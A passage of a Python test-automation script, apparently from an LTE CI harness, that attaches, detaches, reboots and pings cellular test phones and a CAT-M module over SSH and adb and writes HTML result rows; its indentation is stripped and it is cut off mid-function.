logging.debug('\u001B[1m Cellular Functionality enabled\u001B[0m')
time.sleep(4)
# We should check if we register
count = 0
attach_cnt = 0
attach_status = False
while count < 5:
self.command('AT+CEREG?', 'OK', 5)
result = re.search('CEREG: 2,(?P<state>[0-9\-]+),', str(self.ssh.before))
if result is not None:
mDataConnectionState = int(result.group('state'))
if mDataConnectionState is not None:
if mDataConnectionState == 1:
count = 10
attach_status = True
result = re.search('CEREG: 2,1,"(?P<networky>[0-9A-Z]+)","(?P<networkz>[0-9A-Z]+)"', str(self.ssh.before))
if result is not None:
networky = result.group('networky')
networkz = result.group('networkz')
logging.debug('\u001B[1m CAT-M module attached to eNB (' + str(networky) + '/' + str(networkz) + ')\u001B[0m')
else:
logging.debug('\u001B[1m CAT-M module attached to eNB\u001B[0m')
else:
logging.debug('+CEREG: 2,' + str(mDataConnectionState))
attach_cnt = attach_cnt + 1
else:
logging.debug(str(self.ssh.before))
attach_cnt = attach_cnt + 1
count = count + 1
time.sleep(1)
if attach_status:
self.command('AT+CESQ', 'OK', 5)
result = re.search('CESQ: 99,99,255,255,(?P<rsrq>[0-9]+),(?P<rsrp>[0-9]+)', str(self.ssh.before))
if result is not None:
nRSRQ = int(result.group('rsrq'))
nRSRP = int(result.group('rsrp'))
if (nRSRQ is not None) and (nRSRP is not None):
logging.debug(' RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB')
logging.debug(' RSRP = ' + str(-140+nRSRP) + ' dBm')
self.close()
self.picocom_closure = False
html_queue = SimpleQueue()
self.checkDevTTYisUnlocked()
if attach_status:
html_cell = '<pre style="background-color:white">CAT-M module Attachment Completed in ' + str(attach_cnt+4) + ' seconds'
if (nRSRQ is not None) and (nRSRP is not None):
html_cell += '\n RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB'
html_cell += '\n RSRP = ' + str(-140+nRSRP) + ' dBm</pre>'
else:
html_cell += '</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue('N/A', 'OK', 1, html_queue)
else:
logging.error('\u001B[1m CAT-M module Attachment Failed\u001B[0m')
html_cell = '<pre style="background-color:white">CAT-M module Attachment Failed</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue('N/A', 'KO', 1, html_queue)
self.AutoTerminateUEandeNB()
def PingCatM(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
try:
statusQueue = SimpleQueue()
lock = Lock()
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS: not implemented yet')
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
else:
self.command('egrep --color=never "Allocated ipv4 addr" /opt/ltebox/var/log/xGwLog.0', '\$', 5)
result = re.search('Allocated ipv4 addr: (?P<ipaddr>[0-9\.]+) from Pool', str(self.ssh.before))
if result is not None:
moduleIPAddr = result.group('ipaddr')
else:
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ping_time = re.findall("-c (\d+)",str(self.ping_args))
device_id = 'catm'
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' ' + str(moduleIPAddr) + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(moduleIPAddr) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + moduleIPAddr + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
lock.release()
self.close()
html_cell = '<pre style="background-color:white">CAT-M module\nIP Address : ' + moduleIPAddr + '\n' + qMsg + '</pre>'
statusQueue.put(html_cell)
if (packetLossOK):
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', 1, statusQueue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', 1, statusQueue)
self.AutoTerminateUEandeNB()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AttachUE_common(self, device_id, statusQueue, lock, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/on"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
else:
# airplane mode off // radio on
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOnCmd[idx], '\$', 60)
time.sleep(2)
max_count = 45
count = max_count
while count > 0:
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "dumpsys telephony.registry" | grep -m 1 mDataConnectionState', '\$', 15)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "dumpsys telephony.registry"\' | grep -m 1 mDataConnectionState', '\$', 60)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('mDataConnectionState Not Found!')
lock.release()
break
mDataConnectionState = int(result.group('state'))
if mDataConnectionState == 2:
logging.debug('\u001B[1mUE (' + device_id + ') Attach Completed\u001B[0m')
lock.acquire()
statusQueue.put(max_count - count)
statusQueue.put(device_id)
statusQueue.put('Attach Completed')
lock.release()
break
count = count - 1
if count == 15 or count == 30:
logging.debug('\u001B[1;30;43m Retry UE (' + device_id + ') Flight Mode Off \u001B[0m')
if self.ADBCentralized:
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
time.sleep(0.5)
if self.ADBCentralized:
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/on"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOnCmd[idx], '\$', 60)
time.sleep(0.5)
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until mDataConnectionState=2 (' + str(max_count-count) + ' times)\u001B[0m')
time.sleep(1)
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Attach Failed \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('Attach Failed')
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AttachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
status_queue = SimpleQueue()
lock = Lock()
nb_ue_to_connect = 0
for device_id in self.UEDevices:
if (self.nbMaxUEtoAttach == -1) or (nb_ue_to_connect < self.nbMaxUEtoAttach):
self.UEDevicesStatus[nb_ue_to_connect] = UE_STATUS_ATTACHING
p = Process(target = self.AttachUE_common, args = (device_id, status_queue, lock,nb_ue_to_connect,))
p.daemon = True
p.start()
multi_jobs.append(p)
nb_ue_to_connect = nb_ue_to_connect + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow('N/A', 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
return
else:
attach_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
attach_status = False
device_id = status_queue.get()
message = status_queue.get()
if (count < 0):
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
else:
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + ' in ' + str(count + 2) + ' seconds</pre>'
html_queue.put(html_cell)
if (attach_status):
cnt = 0
while cnt < len(self.UEDevices):
if self.UEDevicesStatus[cnt] == UE_STATUS_ATTACHING:
self.UEDevicesStatus[cnt] = UE_STATUS_ATTACHED
cnt += 1
self.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
else:
self.CreateHtmlTestRowQueue('N/A', 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def DetachUE_common(self, device_id, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DetachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
cnt = 0
for device_id in self.UEDevices:
self.UEDevicesStatus[cnt] = UE_STATUS_DETACHING
p = Process(target = self.DetachUE_common, args = (device_id,cnt,))
p.daemon = True
p.start()
multi_jobs.append(p)
cnt += 1
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
cnt = 0
while cnt < len(self.UEDevices):
self.UEDevicesStatus[cnt] = UE_STATUS_DETACHED
cnt += 1
def RebootUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
previousmDataConnectionStates = []
# Save mDataConnectionState
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
sys.exit(1)
previousmDataConnectionStates.append(int(result.group('state')))
# Reboot UE
self.command('stdbuf -o0 adb -s ' + device_id + ' shell reboot', '\$', 10)
time.sleep(60)
previousmDataConnectionState = previousmDataConnectionStates.pop(0)
count = 180
while count > 0:
count = count - 1
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
mDataConnectionState = None
else:
mDataConnectionState = int(result.group('state'))
logging.debug('mDataConnectionState = ' + result.group('state'))
if mDataConnectionState is None or (previousmDataConnectionState == 2 and mDataConnectionState != 2):
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until reboot completion (' + str(180-count) + ' times)\u001B[0m')
time.sleep(1)
else:
logging.debug('\u001B[1mUE (' + device_id + ') Reboot Completed\u001B[0m')
break
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Reboot Failed \u001B[0m')
sys.exit(1)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def RebootUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.RebootUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def DataDisableUE_common(self, device_id, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# disable data service
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "svc data disable"', '\$', 60)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data disable"\'', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Disabled Data Service\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DataDisableUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target = self.DataDisableUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def DataEnableUE_common(self, device_id, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# enable data service
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "svc data enable"', '\$', 60)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data enable"\'', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Enabled Data Service\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DataEnableUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target = self.DataEnableUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def GetAllUEDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
self.command('adb devices', '\$', 15)
self.UEDevices = re.findall("\\\\r\\\\n([A-Za-z0-9]+)\\\\tdevice",str(self.ssh.before))
self.close()
else:
if (os.path.isfile('./phones_list.txt')):
os.remove('./phones_list.txt')
self.command('ls /etc/*/phones*.txt', '\$', 5)
result = re.search('/etc/ci/phones_list.txt', str(self.ssh.before))
self.close()
if (result is not None) and (len(self.UEDevices) == 0):
self.copyin(self.ADBIPAddress, self.ADBUserName, self.ADBPassword, '/etc/ci/phones_list.txt', '.')
if (os.path.isfile('./phones_list.txt')):
phone_list_file = open('./phones_list.txt', 'r')
for line in phone_list_file.readlines():
line = line.strip()
result = re.search('^#', line)
if result is not None:
continue
comma_split = line.split(",")
self.UEDevices.append(comma_split[0])
self.UEDevicesRemoteServer.append(comma_split[1])
self.UEDevicesRemoteUser.append(comma_split[2])
self.UEDevicesOffCmd.append(comma_split[3])
self.UEDevicesOnCmd.append(comma_split[4])
self.UEDevicesRebootCmd.append(comma_split[5])
phone_list_file.close()
if terminate_ue_flag == False:
if len(self.UEDevices) == 0:
logging.debug('\u001B[1;37;41m UE Not Found! \u001B[0m')
sys.exit(1)
if len(self.UEDevicesStatus) == 0:
cnt = 0
while cnt < len(self.UEDevices):
self.UEDevicesStatus.append(UE_STATUS_DETACHED)
cnt += 1
def GetAllCatMDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
self.command('lsusb | egrep "Future Technology Devices International, Ltd FT2232C" | sed -e "s#:.*##" -e "s# #_#g"', '\$', 15)
self.CatMDevices = re.findall("\\\\r\\\\n([A-Za-z0-9_]+)",str(self.ssh.before))
else:
if (os.path.isfile('./modules_list.txt')):
os.remove('./modules_list.txt')
self.command('ls /etc/*/modules*.txt', '\$', 5)
result = re.search('/etc/ci/modules_list.txt', str(self.ssh.before))
self.close()
if result is not None:
logging.debug('Found a module list file on ADB server')
if terminate_ue_flag == False:
if len(self.CatMDevices) == 0:
logging.debug('\u001B[1;37;41m CAT-M UE Not Found! \u001B[0m')
sys.exit(1)
self.close()
def CheckUEStatus_common(self, lock, device_id, statusQueue, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "dumpsys telephony.registry"', '\$', 15)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "dumpsys telephony.registry"\'', '\$', 60)
result = re.search('mServiceState=(?P<serviceState>[0-9]+)', str(self.ssh.before))
serviceState = 'Service State: UNKNOWN'
if result is not None:
lServiceState = int(result.group('serviceState'))
if lServiceState == 3:
serviceState = 'Service State: RADIO_POWERED_OFF'
if lServiceState == 1:
serviceState = 'Service State: OUT_OF_SERVICE'
if lServiceState == 0:
serviceState = 'Service State: IN_SERVICE'
if lServiceState == 2:
serviceState = 'Service State: EMERGENCY_ONLY'
result = re.search('mDataConnectionState=(?P<dataConnectionState>[0-9]+)', str(self.ssh.before))
dataConnectionState = 'Data State: UNKNOWN'
if result is not None:
lDataConnectionState = int(result.group('dataConnectionState'))
if lDataConnectionState == 0:
dataConnectionState = 'Data State: DISCONNECTED'
if lDataConnectionState == 1:
dataConnectionState = 'Data State: CONNECTING'
if lDataConnectionState == 2:
dataConnectionState = 'Data State: CONNECTED'
if lDataConnectionState == 3:
dataConnectionState = 'Data State: SUSPENDED'
result = re.search('mDataConnectionReason=(?P<dataConnectionReason>[0-9a-zA-Z_]+)', str(self.ssh.before))
dataConnectionReason = 'Data Reason: UNKNOWN'
if result is not None:
dataConnectionReason = 'Data Reason: ' + result.group('dataConnectionReason')
lock.acquire()
logging.debug('\u001B[1;37;44m Status Check (' + str(device_id) + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + serviceState + '\u001B[0m')
logging.debug('\u001B[1;34m ' + dataConnectionState + '\u001B[0m')
logging.debug('\u001B[1;34m ' + dataConnectionReason + '\u001B[0m')
statusQueue.put(0)
statusQueue.put(device_id)
qMsg = serviceState + '\n' + dataConnectionState + '\n' + dataConnectionReason
statusQueue.put(qMsg)
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckStatusUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
lock = Lock()
status_queue = SimpleQueue()
i = 0
for device_id in self.UEDevices:
p = Process(target = self.CheckUEStatus_common, args = (lock,device_id,status_queue,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd /opt/flexran_rtc', '\$', 5)
self.command('curl http://localhost:9999/stats | jq \'.\' > log/check_status_' + self.testCase_id + '.log 2>&1', '\$', 5)
self.command('cat log/check_status_' + self.testCase_id + '.log | jq \'.eNB_config[0].UE\' | grep -c rnti | sed -e "s#^#Nb Connected UE = #"', '\$', 5)
result = re.search('Nb Connected UE = (?P<nb_ues>[0-9]+)', str(self.ssh.before))
passStatus = True
if result is not None:
nb_ues = int(result.group('nb_ues'))
htmlOptions = 'Nb Connected UE(s) to eNB = ' + str(nb_ues)
logging.debug('\u001B[1;37;44m ' + htmlOptions + ' \u001B[0m')
if self.expectedNbOfConnectedUEs > -1:
if nb_ues != self.expectedNbOfConnectedUEs:
passStatus = False
else:
htmlOptions = 'N/A'
self.close()
else:
passStatus = True
htmlOptions = 'N/A'
if (status_queue.empty()):
self.CreateHtmlTestRow(htmlOptions, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
check_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
check_status = False
device_id = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
html_queue.put(html_cell)
if check_status and passStatus:
self.CreateHtmlTestRowQueue(htmlOptions, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(htmlOptions, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def GetAllUEIPAddresses(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
ue_ip_status = 0
self.UEIPAddresses = []
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('ifconfig oaitun_ue1', '\$', 4)
result = re.search('inet addr:(?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|inet (?P<ueipaddress2>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)', str(self.ssh.before))
if result is not None:
if result.group('ueipaddress') is not None:
UE_IPAddress = result.group('ueipaddress')
else:
UE_IPAddress = result.group('ueipaddress2')
logging.debug('\u001B[1mUE (' + self.UEDevices[0] + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
self.UEIPAddresses.append(UE_IPAddress)
else:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
ue_ip_status -= 1
self.close()
return ue_ip_status
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
idx = 0
for device_id in self.UEDevices:
if self.UEDevicesStatus[idx] != UE_STATUS_ATTACHED:
idx += 1
continue
count = 0
while count < 4:
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "ip addr show | grep rmnet"', '\$', 15)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ip addr show | grep rmnet"\'', '\$', 60)
result = re.search('inet (?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\/[0-9]+[0-9a-zA-Z\.\s]+', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
time.sleep(1)
count += 1
else:
count = 10
if count < 9:
ue_ip_status -= 1
continue
UE_IPAddress = result.group('ueipaddress')
logging.debug('\u001B[1mUE (' + device_id + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
for ueipaddress in self.UEIPAddresses:
if ueipaddress == UE_IPAddress:
logging.debug('\u001B[1mUE (' + device_id + ') IP Address ' + UE_IPAddress + ': has already been allocated to another device !' + '\u001B[0m')
ue_ip_status -= 1
continue
self.UEIPAddresses.append(UE_IPAddress)
idx += 1
self.close()
return ue_ip_status
def ping_iperf_wrong_exit(self, lock, UE_IPAddress, device_id, statusQueue, message):
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(message)
lock.release()
def Ping_common(self, lock, UE_IPAddress, device_id, statusQueue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
ping_time = re.findall("-c (\d+)",str(self.ping_args))
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
